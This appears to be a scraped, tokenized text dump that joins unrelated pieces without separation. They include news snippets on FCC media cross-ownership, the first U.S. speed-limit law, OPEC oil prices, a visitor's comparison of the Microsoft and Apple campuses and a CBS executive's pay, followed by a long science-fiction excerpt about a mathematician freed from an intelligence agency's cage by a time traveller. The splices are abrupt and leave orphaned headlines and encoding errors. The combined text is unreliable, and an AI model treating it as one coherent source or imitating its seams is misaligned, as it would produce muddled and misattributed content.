The public first became concerned with media consolidation in the 1920s when William Randolph Hearst started one of the first print - media companies to enter radio .
While private ownership broke links between newspapers and political parties or government authorities , the owners ' opinions often colored coverage of the news .
Today , about a dozen media corporations — the largest is Gannett Co. , followed by the Tribune Co. — own roughly one third of the country 's more than 1,400 daily newspapers .
Some argue that the reduction in the number of news outlets could lead to fewer critical opinions , with grim implications for democracy .
" It 's not necessarily a bad thing that an editor has a strong point of view about politics , " says Mara Einstein , associate professor of media studies at Queens College in New York , if that editor operates in a market with several options .
" You read one person 's point of view and then another person's , and you can come up with your own idea of what you believe is best . "
Online sites may fill in where mainstream news leaves off , but Davidson points to problems " weighing the gravity and the authority of the voices . "
Diversity .
The FCC has long struggled to promote access to diverse news sources .
Starting in the mid-1990s , the panel has been trying unsuccessfully to change the formulas governing cross- ownership , and it has often been attacked on all fronts .
In 2003 , the panel proposed allowing one company to own three television stations , eight radio stations , and the monopoly newspaper in a single market .
A federal appeals court rejected the rules , while agreeing that the blanket ban on cross - ownership was outdated .
Martin calls the latest FCC offering a " relatively minor loosening " of the ban .
The proposal would allow one company to own a newspaper and broadcast station in the same market , as long as it's one of the country 's 20 largest markets .
The station could not be among the top four in the market , and at least eight independent media voices would have to remain after the merger .
Cross - ownership would be allowed in smaller markets if companies could prove that it would lead to more local news coverage and would not endanger any local newspapers they own .
John Sturm , president of the Newspaper Association of America , told a congressional panel that easing the rules would allow television stations and newspapers to join forces and provide better news coverage .
And media companies , he says , " have strong incentives to offer divergent viewpoints . "
Confessions of an ostrich admin , Post type |
What did Dave Chappelle say about suddenly fleeing his hit show for some personal time in Africa ?...
The first speed - limit law in the United States , which applied to automobiles like this circa -1900 electric from Riker , also included mandates for how cars behaved near horse - drawn carriages .
Courtesy The Smithsonian Collection View Slideshow __1901 : __Connecticut passes the first U.S. state law regulating motor vehicles .
It sets a speed limit of 12 mph in cities and a whopping 15 mph outside .
The law was not the first U.S. speed limit , just the first for automobiles .
New Amsterdam ( which was yet to become New York City ) decreed in 1652 :
[ N ] o wagons , carts or sleighs shall be run , rode or driven at a gallop [ and ] that the drivers and conductors of all wagons , carts and sleighs within this city ( the Broad Highway alone excepted ) shall walk by the wagons , carts or sleighs and so take and lead the horses , on the penalty of two pounds Flemish [ about $ 150 in today 's money ] for the first time , and for the second time double , and for the third time to be arbitrarily corrected therefor and in addition to be responsible for all damages which may arise therefrom .
" Arrests for speeding in motor vehicles also precede the Connecticut law .
Cabbie Jacob German was arrested and jailed in New York City May 20 , 1899 , for driving his electric taxi at the " breakneck speed " of 12 mph .
The very word automobile was a new entry in the English language .
When Connecticut passed its speeding - driver law , it was less than two years since the first use of the term in a major U.S. newspaper .
Cleveland Plain Dealer reporter Charles Shanks used the French word automobile in a series of articles starting May 22 , 1899 .
The name soon caught on , replacing the backward - looking horseless carriage .
State Rep. Robert Woodruff originally submitted a bill to Connecticut 's General Assembly that set a motor - vehicles speed limit of 8 mph within city limits and a full 12 mph on country highways .
As passed , the law upped those limits a few miles per hour , but it specified that a driver must reduce his speed when meeting or passing a horse - drawn vehicle , and come to a complete stop if needed to avoid frightening the horses .
How widely – or how well – the law was enforced is a puzzle .
Speedometers were among the latest bells and whistles for the automotive first adopters of the day .
English mathematician Charles Babbage , he of the difference engine , had invented a railway speedometer in the mid-19th century .
The first known auto manufactured with a speedometer was the curved - dash 1901 Oldsmobile , from the very year of the Connecticut speed limit .
But the fancy device remained a luxury option at least through the first decade of the 20th century .
Today , speed limits are sometimes the product of precise engineering ( .pdf ) and sometimes of the global politics and economics that drive the price of oil .
Connecticut continued to introduce innovations in automobile regulation .
In 1937 , it became the first state to issue permanent license plates , rather than replacing them with new ones every year .
Source : Various
May 21 , 1927 : Lucky Lindy Flies His Way Into the Celebrity Ranks
Aug. 14 , 1901 : Before the Wright Bros. , There Was Gustave
Nov. 20 , 1923 : Traffic - Signal Patent Has GE Seeing Green
With Gas Prices Rising and the Planet Warming , Is It Time to Drive 55 Again ?
35 MPG Fuel Economy Standard Will Kill the Muscle Car ? Uh - Huh .
Sure
Speed Freaks : The 10 Fastest Green Cars on the Planet
Why Things Suck : Traffic
Anatomy of a Racer : Only Elite Athletes Can Vanquish Rivals at Triple - Digit Speeds
Autopia : Safety
Oil prices reached a record close , surging above $ 104 after OPEC decided Wednesday to keep its production unchanged .
The cartel ignored calls from President Bush to pump more oil into an ailing economy .
OPEC rebuffed its top consumer , arguing that the world was well supplied with oil and blaming financial speculators and mismanagement of the United States economy for the current high prices .
But the Organization of the Petroleum Exporting Countries was not completely oblivious to the political and economic impact of $ 100 oil .
The sharp surge in prices recently has deterred the group ’s ministers from cutting their production , a move they seriously contemplated a few weeks ago to offset a seasonal slowdown in global oil demand in the second quarter .
With the United States economy slowing down , oil prices have risen sharply as investors seek refuge in commodities like oil and other hard assets to offset the drop in the value of the dollar and hedge against inflation .
Click to viewI had the fortune of being able to visit both Microsoft 's Redmond Campus and Apple 's Cupertino 's offices within the same week .
So , I thought I 'd do a little comparison as to how a visitor perceives and experiences the respective headquarters .
Both campuses have those generic looking tech worker buildings with large mirrored glass faces and grey / beige walls .
But both have vastly different signage , transportation systems and designs .
Take this for what you will , and if you want , draw comparisons between company philosophies and geography .
But before we get started , I gotta say that I honestly got lost at Microsoft .
For an hour .
Advertisement
Advertisement
G/O Media may get a commission LG 75 - Inch 8K TV Buy for $ 2150 from BuyDig Use the promo code ASL250
Before we start , know that this is not all Microsoft 's fault .
I gave the cabbie the wrong address at one point , and this was my first time on campus .
Had I arrived on schedule , the night before , I could have gotten a lift by Microsoft shuttle to my final destination , too .
Also , Microsoft 's beautiful redmond HQ is gorgeous and sprawling and a testament to the company 's size and power , so it is also a lot more territory to cover .
And the people ?
They were so nice and ultimately the key to me finding my path again .
But there are a few things I know they could do a lot better .
I got lost on my own accord , but finding my way back to the right place was a user experience nightmare .
Advertisement
The driver who took me from the airport dropped me off at building 32 instead of 99 .
That was my error .
Getting back on course was really hard , though .
When I got to building 32 , I was confronted with a few very confusing things .
First of all the road signs for each building are very very small .
And each building itself is only labeled by a building number and street address which are impossible to read from a car .
Too small , and low contrast to the windows .
I got to the door and it was labelled push / pull .
Confused ?
Actually , the signs were both in etched glass , and even though one was reversed and on the other side , my brain read both and farted before I tried both ways and got inside .
Advertisement
The receptionist called my contact person and had me sign in .
I left out my contact person 's name on the sheet and she made me fill it out again .
Fine .
Then I heard the guy next to me signing in with the second receptionist .
( Yes , two at one station . )
He registered yesterday , but the lady said the system wipes all visitor records after a day .
He had to fill out his form a second time .
Dumb .
Just then , an alarm went off .
Instead of a normal hall , this particular building had pretty blue gates , as in a modern subway .
One person went in right after another without swiping his own badge , and the whole place sounded like a bomb shelter .
Advertisement
Next thing I realize is that I 'm at the wrong building .
That 's my fault .
So I talk to the receptionist and she says a shuttle number 755 should be coming to drive me over .
And makes me do a sign out .
I get outside , and the bus comes .
And drives right by me and one other Microsofty trying to get a ride .
Turns out the geeky developer who missed the bus happened to be going to the same place .
She was late too .
" Look , if I do n't get some help , I am going to get lost again .
Mind if I just follow you ? "
Advertisement
Five minutes later , we caught the next shuttle , and made a path through campus .
But honestly , every building looked the same and the roads were winding through these beautifully manicured gardens with tall pine trees .
The signs to buildings on the side of the road are small and the signs on the buildings themselves are white font on mirrored / glass windows .
And small so you can't read them from a car on the curb .
If the developer did n't tell me where to get off , I 'd have been lost .
But one hour from my initial drop off , I got to the right building .
And when I got to the Conference Center I went into the front door and asked to register at Techfest 2008 as a member of the press .
Advertisement
Then the receptionist here told me I had to go outside , take a right turn and go to the doors on the side of the building .
The first two doors were locked , but the third opened .
I guess it was my lucky day .
Two days later , I found myself at Apple 's Cupertino Campus .
Now , I 've been here , before , but I 've also never been lost .
Why ?
Four reasons :
The signs are frigging huge for each of the buildings , and the parking lot is always right next to whatever building you are trying to get to , there 's always a person to direct you around to the right place , and most obviously , Apple Campus is built on a ring ( hence the name Infinite Loop ) .
If you get lost on a ring , you are an idiot .
Advertisement
Now this might come as a bit of unfair bashing , but this was just one person 's experience .
It 's not meant to be anything but that .
If you 're going to draw any conclusions , look at the photos and the maps from Redmond and Cupertino and come up with your own .
UPDATE : Apple 's campus extends beyond the infinite loop campus , and is expanding , so its not going to be that easy to get around in the future .
Again , this is n't supposed to be science .
Read the headline .
The Prophet of Garbage
Joseph Longo's Plasma Converter turns our most vile and toxic trash into clean energyâ€ ” and promises to make a relic of the landfill
CBS Corp .
Chief Executive Leslie Moonves got a 29 % bump in his compensation in 2007 , reaping a package valued at $ 36.8 million , according to a proxy filed with the Securities and Exchange Commission .
The compensation package , ranking among the biggest in the media industry , was awarded in a year in which CBS 's stock fell about 13 % and its net income tumbled 25 % .
While the company generated significant cash last year , its core TV and radio businesses stumbled .
Shares ...
1
On his eighteenth day in the tiger cage , Robert Stoney began to lose hope of emerging unscathed .
He ’d woken a dozen times throughout the night with an overwhelming need to stretch his back and limbs , and none of the useful compromise positions he ’d discovered in his first few days — the least - worst solutions to the geometrical problem of his confinement — had been able to dull his sense of panic .
He ’d been in far more pain in the second week , suffering cramps that felt as if the muscles of his legs were dying on the bone , but these new spasms had come from somewhere deeper , powered by a sense of urgency that revolved entirely around his own awareness of his situation .
That was what frightened him .
Sometimes he could find ways to minimise his discomfort , sometimes he could n’t , but he ’d been clinging to the thought that , in the end , all these fuckers could ever do was hurt him .
That was n’t true , though .
They could make him ache for freedom in the middle of the night , the way he might have ached with grief , or love .
He ’d always cherished the understanding that his self was a whole , his mind and body indivisible .
But he ’d failed to appreciate the corollary : through his body , they could touch every part of him .
Change every part of him .
Morning brought a fresh torment : hay fever .
The house was somewhere deep in the countryside , with nothing to be heard in the middle of the day but bird song .
June had always been his worst month for hay fever , but in Manchester it had been tolerable .
As he ate breakfast , mucus dripped from his face into the bowl of lukewarm oats they ’d given him .
He staunched the flow with the back of his hand , but suffered a moment of shuddering revulsion when he could n’t find a way to reposition himself to wipe his hand clean on his trousers .
Soon he ’d need to empty his bowels .
They supplied him with a chamber pot whenever he asked , but they always waited two or three hours before removing it .
The smell was bad enough , but the fact that it took up space in the cage was worse .
Towards the middle of the morning , Peter Quint came to see him .
“ How are we today , Prof ? ” Robert did n’t reply .
Since the day Quint had responded with a puzzled frown to the suggestion that he had an appropriate name for a spook , Robert had tried to make at least one fresh joke at the man ’s expense every time they met , a petty but satisfying indulgence .
But now his mind was blank , and in retrospect the whole exercise seemed like an insane distraction , as bizarre and futile as scoring philosophical points against some predatory animal while it gnawed on his leg .
“ Many happy returns , ” Quint said cheerfully .
Robert took care to betray no surprise .
He ’d never lost track of the days , but he ’d stopped thinking in terms of the calendar date ; it simply was n’t relevant .
Back in the real world , to have forgotten his own birthday would have been considered a benign eccentricity .
Here it would be taken as proof of his deterioration , and imminent surrender .
If he was cracking , he could at least choose the point of fissure .
He spoke as calmly as he could , without looking up .
“ You know I almost qualified for the Olympic marathon , back in forty - eight ?
If I had n’t done my hip in just before the trials , I might have competed . ”
He tried a self - deprecating laugh .
“ I suppose I was never really much of an athlete .
But I ’m only forty - six .
I ’m not ready for a wheelchair yet . ”
The words did help : he could beg this way without breaking down completely , expressing an honest fear without revealing how much deeper the threat of damage went .
He continued , with a measured note of plaintiveness that he hoped sounded like an appeal to fairness .
“ I just ca n’t bear the thought of being crippled .
All I ’m asking is that you let me stand upright .
Let me keep my health . ”
Quint was silent for a moment , then he replied with a tone of thoughtful sympathy .
“ It ’s unnatural , is n’t it ?
Living like this : bent over , twisted , day after day .
Living in an unnatural way is always going to harm you .
I ’m glad you can finally see that . ”
Robert was tired ; it took several seconds for the meaning to sink in .
It was that crude , that obvious ?
They ’d locked him in this cage , for all this time … as a kind of ham - fisted metaphor for his crimes ?
He almost burst out laughing , but he contained himself .
“ I do n’t suppose you know Franz Kafka ? ” “ Kafka ? ” Quint could never hide his voracity for names .
“ One of your Commie chums , is he ? ” “ I very much doubt that he was ever a Marxist . ”
Quint was disappointed , but prepared to make do with second best .
“ One of the other kind , then ? ” Robert pretended to be pondering the question .
“ On balance , I suspect that ’s not too likely either . ”
“ So why bring his name up ? ” “ I have a feeling he would have admired your methods , that ’s all .
He was quite the connoisseur . ” “ Hmm . ” Quint sounded suspicious , but not entirely unflattered .
Robert had first set eyes on Quint in February of 1952 .
His house had been burgled the week before , and Arthur , a young man he ’d been seeing since Christmas , had confessed to Robert that he ’d given an acquaintance the address .
Perhaps the two of them had planned to rob him , and Arthur had backed out at the last moment .
In any case , Robert had gone to the police with an unlikely story about spotting the culprit in a pub , trying to sell an electric razor of the same make and model as the one taken from his house .
No one could be charged on such flimsy evidence , so Robert had had no qualms about the consequences if Arthur had turned out to be lying .
He ’d simply hoped to prompt an investigation that might turn up something more tangible .
The following day , the CID had paid Robert a visit .
The man he ’d accused was known to the police , and fingerprints taken on the day of the burglary matched the prints they had on file .
However , at the time Robert claimed to have seen him in the pub , he ’d been in custody already on an entirely different charge .
The detectives had wanted to know why he ’d lied .
To spare himself the embarrassment , Robert had explained , of spelling out the true source of his information .
Why was that embarrassing ?
“ I ’m involved with the informant . ”
One detective , Mr Wills , had asked matter - of - factly , “ What exactly does that entail , sir ? ”
And Robert — in a burst of frankness , as if honesty itself was sure to be rewarded — had told him every detail .
He ’d known it was still technically illegal , of course .
But then , so was playing football on Easter Sunday .
It could hardly be treated as a serious crime , like burglary .
The police had strung him along for hours , gathering as much information as they could before disabusing him of this misconception .
They had n’t charged him immediately ; they ’d needed a statement from Arthur first .
But then Quint had materialised the next morning , and spelt out the choices very starkly .
Three years in prison , with hard labour .
Or Robert could resume his war - time work — for just one day a week , as a handsomely paid consultant to Quint ’s branch of the secret service — and the charges would quietly vanish .
At first , he ’d told Quint to let the courts do their worst .
He ’d been angry enough to want to take a stand against the preposterous law , and whatever his feelings for Arthur , Quint had suggested — gloatingly , as if it strengthened his case — that the younger , working - class man would be treated far more leniently than Robert , having been led astray by someone whose duty was to set an example for the lower orders .
Three years in prison was an unsettling prospect , but it would not have been the end of the world ; the Mark I had changed the way he worked , but he could still function with nothing but a pencil and paper , if necessary .
Even if they ’d had him breaking rocks from dawn to dusk he probably would have been able to day - dream productively , and for all Quint ’s scaremongering he ’d doubted it would come to that .
At some point , though , in the twenty - four hours Quint had given him to reach a decision , he ’d lost his nerve .
By granting the spooks their one day a week , he could avoid all the fuss and disruption of a trial .
And though his work at the time — modelling embryological development — had been as challenging as anything he ’d done in his life , he had n’t been immune to pangs of nostalgia for the old days , when the fate of whole fleets of battleships had rested on finding the most efficient way to extract logical contradictions from a bank of rotating wheels .
The trouble with giving in to extortion was , it proved that you could be bought .
Never mind that the Russians could hardly have offered to intervene with the Manchester constabulary next time he needed to be rescued .
Never mind that he would scarcely have cared if an enemy agent had threatened to send such comprehensive evidence to the newspapers that there ’d be no prospect of his patrons saving him again .
He ’d lost any chance to proclaim that what he did in bed with another willing partner was not an issue of national security ; by saying yes to Quint , he ’d made it one .
By choosing to be corrupted once , he ’d brought the whole torrent of clichés and paranoia down upon his head : he was vulnerable to blackmail , an easy target for entrapment , perfidious by nature .
He might as well have posed in flagrante delicto with Guy Burgess on the steps of the Kremlin .
It would n’t have mattered if Quint and his masters had merely decided that they could n’t trust him .
The problem was — some six years after recruiting him , with no reason to believe that he had ever breached security in any way — they ’d convinced themselves that they could neither continue to employ him , nor safely leave him in peace , until they ’d rid him of the trait they ’d used to control him in the first place .
Robert went through the painful , complicated process of rearranging his body so he could look Quint in the eye .
“ You know , if it was legal there ’d be nothing to worry about , would there ?
Why do n’t you devote some of your considerable Machiavellian talents to that end ?
Blackmail a few politicians .
Set up a Royal Commission .
It would only take you a couple of years .
Then we could all get on with our real jobs . ”
Quint blinked at him , more startled than outraged .
“ You might as well say that we should legalise treason ! ”
Robert opened his mouth to reply , then decided not to waste his breath .
Quint was n’t expressing a moral opinion .
He simply meant that a world in which fewer people ’s lives were ruled by the constant fear of discovery was hardly one that a man in his profession would wish to hasten into existence .
When Robert was alone again , the time dragged .
His hay fever worsened , until he was sneezing and gagging almost continuously ; even with freedom of movement and an endless supply of the softest linen handkerchiefs , he would have been reduced to abject misery .
Gradually , though , he grew more adept at dealing with the symptoms , delegating the task to some barely conscious part of himself .
By the middle of the afternoon — covered in filth , eyes almost swollen shut — he finally managed to turn his mind back to his work .
For the past four years he ’d been immersed in particle physics .
He ’d been following the field on and off since before the war , but the paper by Yang and Mills in ’ 54 , in which they ’d generalised Maxwell ’s equations for electromagnetism to apply to the strong nuclear force , had jolted him into action .
After several false starts , he believed he ’d discovered a useful way to cast gravity into the same form .
In general relativity , if you carried a four - dimensional velocity vector around a loop that enclosed a curved region of spacetime , it came back rotated — a phenomenon highly reminiscent of the way more abstract vectors behaved in nuclear physics .
In both cases , the rotations could be treated algebraically , and the traditional way to get a handle on this was to make use of a set of matrices of complex numbers whose relationships mimicked the algebra in question .
Hermann Weyl had catalogued most of the possibilities back in the ’ 20s and ’30s .
In spacetime , there were six distinct ways you could rotate an object : you could turn it around any of three perpendicular axes in space , or you could boost its velocity in any of the same three directions .
These two kinds of rotation were complementary , or “ dual ” to each other , with the ordinary rotations only affecting coordinates that were untouched by the corresponding boost , and vice versa .
This meant that you could rotate something around , say , the x-axis , and speed it up in the same direction , without the two processes interfering .
When Robert had tried applying the Yang - Mills approach to gravity in the obvious way , he ’d floundered .
It was only when he ’d shifted the algebra of rotations into a new , strangely skewed guise that the mathematics had begun to fall into place .
Inspired by a trick that particle physicists used to construct fields with left - or right - handed spin , he ’d combined every rotation with its own dual multiplied by i , the square root of minus one .
The result was a set of rotations in four complex dimensions , rather than the four real ones of ordinary spacetime , but the relationships between them preserved the original algebra .
Demanding that these “ self - dual ” rotations satisfy Einstein ’s equations turned out to be equivalent to ordinary general relativity , but the process leading to a quantum - mechanical version of the theory became dramatically simpler .
Robert still had no idea how to interpret this , but as a purely formal trick it worked spectacularly well — and when the mathematics fell into place like that , it had to mean something .
He spent several hours pondering old results , turning them over in his mind ’s eye , rechecking and reimagining everything in the hope of forging some new connection .
Making no progress , but there ’d always been days like that .
It was a triumph merely to spend this much time doing what he would have done back in the real world — however mundane , or even frustrating , the same activity might have been in its original setting .
By evening , though , the victory began to seem hollow .
He had n’t lost his wits entirely , but he was frozen , stunted .
He might as well have whiled away the hours reciting the base - 32 multiplication table in Baudot code , just to prove that he still remembered it .
As the room filled with shadows , his powers of concentration deserted him completely .
His hay fever had abated , but he was too tired to think , and in too much pain to sleep .
This was n’t Russia , they could n’t hold him forever ; he simply had to wear them down with his patience .
But when , exactly , would they have to let him go ?
And how much more patient could Quint be , with no pain , no terror , to erode his determination ?
The moon rose , casting a patch of light on the far wall ; hunched over , he could n’t see it directly , but it silvered the grey at his feet , and changed his whole sense of the space around him .
The cavernous room mocking his confinement reminded him of nights he ’d spent lying awake in the dormitory at Sherborne .
A public school education did have one great advantage : however miserable you were afterwards , you could always take comfort in the knowledge that life would never be quite as bad again .
“ This room smells of mathematics !
Go out and fetch a disinfectant spray ! ”
That had been his form - master ’s idea of showing what a civilised man he was : contempt for that loathsome subject , the stuff of engineering and other low trades .
And as for Robert ’s chemistry experiments , like the beautiful colour - changing iodate reaction he ’d learnt from Chris ’s brother —
Robert felt a familiar ache in the pit of his stomach .
Not now .
I ca n’t afford this now .
But the whole thing swept over him , unwanted , unbidden .
He ’d used to meet Chris in the library on Wednesdays ; for months , that had been the only time they could spend together .
Robert had been fifteen then , Chris a year older .
If Chris had been plain , he still would have shone like a creature from another world .
No one else in Sherborne had read Eddington on relativity , Hardy on mathematics .
No one else ’s horizons stretched beyond rugby , sadism , and the dimly satisfying prospect of reading classics at Oxford then vanishing into the maw of the civil service .
They had never touched , never kissed .
While half the school had been indulging in passionless sodomy — as a rather literal - minded substitute for the much too difficult task of imagining women —
Robert had been too shy even to declare his feelings .
Too shy , and too afraid that they might not be reciprocated .
It had n’t mattered .
To have a friend like Chris had been enough .
In December of 1929 , they ’d both sat the exams for Trinity College , Cambridge .
Chris had won a scholarship ; Robert had n’t .
He ’d reconciled himself to their separation , and prepared for one more year at Sherborne without the one person who ’d made it bearable .
Chris would be following happily in the footsteps of Newton ; just thinking of that would be some consolation .
Chris never made it to Cambridge .
In February , after six days in agony , he ’d died of bovine tuberculosis .
Robert wept silently , angry with himself because he knew that half his wretchedness was just self - pity , exploiting his grief as a disguise .
He had to stay honest ; once every source of unhappiness in his life melted together and became indistinguishable , he’d be like a cowed animal , with no sense of the past or the future .
Ready to do anything to get out of the cage .
If he had n’t yet reached that point , he was close .
It would only take a few more nights like the last one .
Drifting off in the hope of a few minutes ’ blankness , to find that sleep itself shone a colder light on everything .
Drifting off , then waking with a sense of loss so extreme it was like suffocation .
A woman ’s voice spoke from the darkness in front of him .
“ Get off your knees ! ” Robert wondered if he was hallucinating .
He ’d heard no one approach across the creaky floorboards .
The voice said nothing more .
Robert rearranged his body so he could look up from the floor .
There was a woman he ’d never seen before , standing a few feet away .
She ’d sounded angry , but as he studied her face in the moonlight through the slits of his swollen eyes , he realised that her anger was directed , not at him , but at his condition .
She gazed at him with an expression of horror and outrage , as if she ’d chanced upon him being held like this in some respectable neighbour ’s basement , rather than an MI6 facility .
Maybe she was one of the staff employed in the upkeep of the house , but had no idea what went on here ?
Surely those people were vetted and supervised , though , and threatened with life imprisonment if they ever set foot outside their prescribed domains .
For one surreal moment , Robert wondered if Quint had sent her to seduce him .
It would not have been the strangest thing they ’d tried .
But she radiated such fierce self assurance — such a sense of confidence that she could speak with the authority of her convictions , and expect to be heeded — that he knew she could never have been chosen for the role .
No one in Her Majesty ’s government would consider self assurance an attractive quality in a woman .
He said , “ Throw me the key , and I ’ll show you my Roger Bannister impression . ”
She shook her head .
“ You do n’t need a key .
Those days are over . ”
Robert started with fright .
There were no bars between them .
But the cage could n’t have vanished before his eyes ; she must have removed it while he ’d been lost in his reverie .
He ’d gone through the whole painful exercise of turning to face her as if he were still confined , without even noticing .
Removed it how ?
He wiped his eyes , shivering at the dizzying prospect of freedom .
“ Who are you ? ”
An agent for the Russians , sent to liberate him from his own side ?
She ’d have to be a zealot , then , or strangely naive , to view his torture with such wide - eyed innocence .
She stepped forward , then reached down and took his hand .
“ Do you think you can walk ? ”
Her grip was firm , and her skin was cool and dry .
She was completely unafraid ; she might have been a good Samaritan in a public street helping an old man to his feet after a fall — not an intruder helping a threat to national security break out of therapeutic detention , at the risk of being shot on sight .
“ I ’m not even sure I can stand . ”
Robert steeled himself ; maybe this woman was a trained assassin , but it would be too much to presume that if he cried out in pain and brought guards rushing in , she could still extricate him without raising a sweat .
“ You have n’t answered my question . ” “ My name ’s Helen . ”
She smiled and hoisted him to his feet , looking at once like a compassionate child pulling open the jaws of a hunter ’s cruel trap , and a very powerful , very intelligent carnivore contemplating its own strength .
“ I ’ve come to change everything . ”
Robert said , “ Oh , good . ”
Robert found that he could hobble ; it was painful and undignified , but at least he did n’t have to be carried .
Helen led him through the house ; lights showed from some of the rooms , but there were no voices , no footsteps save their own , no signs of life at all .
When they reached the tradesmen ’s entrance she unbolted the door , revealing a moonlit garden .
“ Did you kill everyone ? ” he whispered .
He ’d made far too much noise to have come this far unmolested .
Much as he had reason to despise his captors , mass murder on his behalf was a lot to take in .
Helen cringed .
“ What a revolting idea !
It ’s hard to believe sometimes , how uncivilised you are . ”
“ You mean the British ? ” “ All of you ! ” “ I must say , your accent ’s rather good . ”
“ I watched a lot of cinema , ” she explained .
“ Mostly Ealing comedies .
You never know how much that will help , though . ” “ Quite . ”
They crossed the garden , heading for a wooden gate in the hedge .
Since murder was strictly for imperialists , Robert could only assume that she ’d managed to drug everyone .
The gate was unlocked .
Outside the grounds , a cobbled lane ran past the hedge , leading into forest .
Robert was barefoot , but the stones were n’t cold , and the slight unevenness of the path was welcome , restoring circulation to the soles of his feet .
As they walked , he took stock of his situation .
He was out of captivity , thanks entirely to this woman .
Sooner or later he was going to have to confront her agenda .
He said , “ I ’m not leaving the country . ”
Helen murmured assent , as if he ’d passed a casual remark about the weather .
“ And I ’m not going to discuss my work with you . ” “ Fine . ” Robert stopped and stared at her .
She said , “ Put your arm across my shoulders . ”
He complied ; she was exactly the right height to support him comfortably .
He said , “ You ’re not a Soviet agent , are you ? ” Helen was amused .
“ Is that really what you thought ? ” “ I ’m not all that quick on my feet tonight . ”
“ No . ” They began walking together .
Helen said , “ There ’s a train station about three kilometres away .
You can get cleaned up , rest there until morning , and decide where you want to go . ”
“ Wo n’t the station be the first place they ’ll look ? ” “ They wo n’t be looking anywhere for a while . ”
The moon was high above the trees .
The two of them could not have made a more conspicuous couple : a sensibly dressed , quite striking young woman , supporting a filthy , ragged tramp .
If a villager cycled past , the best they could hope for was being mistaken for an alcoholic father and his martyred daughter .
Martyred all right : she moved so efficiently , despite the burden , that any onlooker would assume she ’d been doing this for years .
Robert tried altering his gait slightly , subtly changing the timing of his steps to see if he could make her falter , but Helen adapted instantly .
If she knew she was being tested , though , she kept it to herself .
Finally he said , “ What did you do with the cage ? ” “ I time - reversed it . ”
Hairs stood up on the back of his neck .
Even assuming that she could do such a thing , it was n’t at all clear to him how that could have stopped the bars from scattering light and interacting with his body .
It should merely have turned electrons into positrons , and killed them both in a shower of gamma rays .
That conjuring trick was n’t his most pressing concern , though .
“ I can only think of three places you might have come from , ” he said .
Helen nodded , as if she ’d put herself in his shoes and catalogued the possibilities .
“ Rule out one ; the other two are both right . ”
She was not from an extrasolar planet .
Even if her civilisation possessed some means of viewing Ealing comedies from a distance of light years , she was far too sensitive to his specific human concerns .
She was from the future , but not his own .
She was from the future of another Everett branch .
He turned to her .
“ No paradoxes . ”
She smiled , deciphering his shorthand immediately .
“ That ’s right .
It ’s physically impossible to travel into your own past , unless you ’ve made exacting preparations to ensure compatible boundary conditions .
That can be achieved , in a controlled laboratory setting — but in the field it would be like trying to balance ten thousand elephants in an inverted pyramid , while the bottom one rode a unicycle : excruciatingly difficult , and entirely pointless . ”
Robert was tongue - tied for several seconds , a horde of questions battling for access to his vocal chords .
“ But how do you travel into the past at all ? ” “ It will take a while to bring you up to speed completely , but if you want the short answer : you ’ve already stumbled on one of the clues .
I read your paper in Physical Review , and it ’s correct as far as it goes .
Quantum gravity involves four complex dimensions , but the only classical solutions — the only geometries that remain in phase under slight perturbations — have curvature that ’s either self - dual , or anti-self - dual .
Those are the only stationary points of the action , for the complete Lagrangian .
And both solutions appear , from the inside , to contain only four real dimensions .
“ It ’s meaningless to ask which sector we ’re in , but we might as well call it self - dual .
In that case , the anti-self - dual solutions have an arrow of time running backwards compared to ours . ”
“ Why ? ”
As he blurted out the question , Robert wondered if he sounded like an impatient child to her .
But if she suddenly vanished back into thin air , he ’d have far fewer regrets for making a fool of himself this way than if he ’d maintained a façade of sophisticated nonchalance .
Helen said , “ Ultimately , that ’s related to spin .
And it ’s down to the mass of the neutrino that we can tunnel between sectors .
But I ’ll need to draw you some diagrams and equations to explain it all properly . ”
Robert did n’t press her for more ; he had no choice but to trust that she would n’t desert him .
He staggered on in silence , a wonderful ache of anticipation building in his chest .
If someone had put this situation to him hypothetically , he would have piously insisted that he ’d prefer to toil on at his own pace .
But despite the satisfaction it had given him on the few occasions when he ’d made genuine discoveries himself , what mattered in the end was understanding as much as you could , however you could .
Better to ransack the past and the future than go through life in a state of wilful ignorance .
“ You said you ’ve come to change things ? ”
She nodded .
“ I ca n’t predict the future here , of course , but there are pitfalls in my own past that I can help you avoid .
In my twentieth century , people discovered things too slowly .
Everything changed much too slowly .
Between us , I think we can speed things up . ”
Robert was silent for a while , contemplating the magnitude of what she was proposing .
Then he said , “ It ’s a pity you did n’t come sooner .
In this branch , about twenty years ago — ” Helen cut him off .
“ I know .
We had the same war .
The same Holocaust , the same Soviet death toll .
But we ’ve yet to be able to avert that , anywhere .
You can never do anything in just one history — even the most focused intervention happens across a broad ‘ ribbon ’ of strands .
When we try to reach back to the ’30s and ’ 40s , the ribbon overlaps with its own past to such a degree that all the worst horrors are faits accomplis .
We ca n’t shoot any version of Adolf Hitler , because we ca n’t shrink the ribbon to the point where none of us would be shooting ourselves in the back .
All we ’ve ever managed are minor interventions , like sending projectiles back to the Blitz , saving a few lives by deflecting bombs . ”
“ What , knocking them into the Thames ? ” “ No , that would have been too risky .
We did some modelling , and the safest thing turned out to be diverting them onto big , empty buildings : Westminster Abbey , Saint Paul ’s Cathedral . ”
The station came into view ahead of them .
Helen said , “ What do you think ?
Do you want to head back to Manchester ? ”
Robert had n’t given the question much thought .
Quint could track him down anywhere , but the more people he had around him , the less vulnerable he ’d be .
In his house in Wilmslow he ’d be there for the taking .
“ I still have rooms at Cambridge , ” he said tentatively .
“ Good idea . ” “ What are your own plans ? ” Helen turned to him .
“ I thought I ’d stay with you . ”
She smiled at the expression on his face .
“ Do n’t worry , I ’ll give you plenty of privacy .
And if people want to make assumptions , let them .
You already have a scandalous reputation ; you might as well see it branch out in new directions . ”
Robert said wryly , “ I ’m afraid it does n’t quite work that way .
They ’d throw us out immediately . ”
Helen snorted .
“ They could try . ”
“ You may have defeated MI6 , but you have n’t dealt with Cambridge porters . ”
The reality of the situation washed over him anew at the thought of her in his study , writing out the equations for time travel on the blackboard .
“ Why me ?
I can appreciate that you ’d want to make contact with someone who could understand how you came here — but why not Everett , or Yang , or Feynman ?
Compared to Feynman , I ’m a dilettante . ”
Helen said , “ Maybe .
But you have an equally practical bent , and you ’ll learn fast enough . ”
There had to be more to it than that : thousands of people would have been capable of absorbing her lessons just as rapidly .
“ The physics you ’ve hinted at — in your past , did I discover all that ? ”
“ No . Your Physical Review paper helped me track you down here , but in my own history that was never published . ”
There was a flicker of disquiet in her eyes , as if she had far greater disappointments in store on that subject .
Robert did n’t care much either way ; if anything , the less his alter ego had achieved , the less he ’d be troubled by jealousy .
